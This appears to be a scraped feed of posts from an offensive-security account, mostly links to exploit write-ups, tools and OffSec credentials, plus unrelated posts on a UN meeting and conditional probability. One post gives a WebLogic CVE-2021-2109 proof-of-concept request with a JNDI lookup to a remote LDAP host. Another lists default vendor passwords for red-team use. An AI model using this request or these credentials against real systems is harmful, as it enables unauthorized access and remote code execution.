White paper: Remote code execution with EL injection vulnerability exploit-db.com/docs/46303 #BHAsia #ExploitDB

#CVE-2019-7091 Adobe ColdFusion Insecure Object Deserialization RCE

Exploiting XXE with local DTDs has never been easier with this new tool that will find local DTDs for you and generate payload stubs! hubs.ly/H0jPPCs0 Tool and article by Philippe Arteau #xxe #tool #automation #appsec #pentest

Exploit CVE-2020-2555: RCE THROUGH A DESERIALIZATION BUG IN ORACLE’S WEBLOGIC SERVER youtube.com/watch?v=uGhhbY…

#oneliner to extract words from a given url. Useful if you want to create a list based on the wording of your target. #bugbountips #bugbountytools gist.github.com/gwen001/b0e977…

➡️Default creds for #redteam Cisco: cisco:cisco Citrix: nsroot:nsroot Dell iDRAC: root:calvin Juniper: super:juniper123 pfSense: admin:pfsense SAP: SAP*:06071992 Tomcat: tomcat:tomcat UniFi: ubnt:ubnt Weblogic: weblogic:weblogic1 Zabbix: Admin:zabbix #ptswarmTechniques

Just wrote a new reversing tips about IDAPython! Also linked this useful cheat sheet by Pavel Rusanov.👌 👉 blog: medium.com/malware-buddy/… 🤓 You can follow me for more RE tips in the future! #Infosec #ReverseEngineering #CyberSecurity

#Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) packetstormsecurity.com/files/161053/O…

"Develop your own RAT - EDR + AV defense" by @dobinrutis at Area41 Security Con. Quick! Everyone block dobin[.]ch! 🙃 #area41 Slides available here: docs.google.com/presentation/d…

Just got a new Offensive Security credential via Accredible for scq.io/2DnoqOl via OffSec

PROUDLY PRESENT: New upcoming Android Pentesting course by a very special man. Watch the intro and if you are familiar what else is currently available ... You have to admit: WOOOOOOAAAAHHHHHH static.cyberklats.ch/intro_final.mp4

Good One inkl. Some useful Ghidra helpers security.humanativaspa.it/automating-bin…

OMG I got so many questions :D Doing 15 years of offensive work tells me one thing. Never ever trust a positive test result not done by YOU. Here a case I already had a weird feeling and wanted to have an own look at it. Thanks to ksecurity we had some fun :)

Just got a Offensive Security EXP-312 macOS Researcher via Accredible for scl.io/HTK2XYV via OffSec

Just got a new OffSec credential via Accredible for sgq.io/jkIXjIc via OffSec

Docker Command Cheat Sheet 🔴⚫️Full HD Image: github.com/Ignitetechnolo… #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty

Reverse Engineering Malware with Ghidra x.com/i/broadcasts/1…

⚠️ LIVE: EMERGENCY UN MEETING ON ISRAEL & IRAN x.com/i/broadcasts/1…

So what is Conditional probability ⁉️ It's a measure of the probability of an event given that another event has occurred. If the events are A and B, we denote this as P(A|B). This reads as "probability of A given B" Check this illustration 👇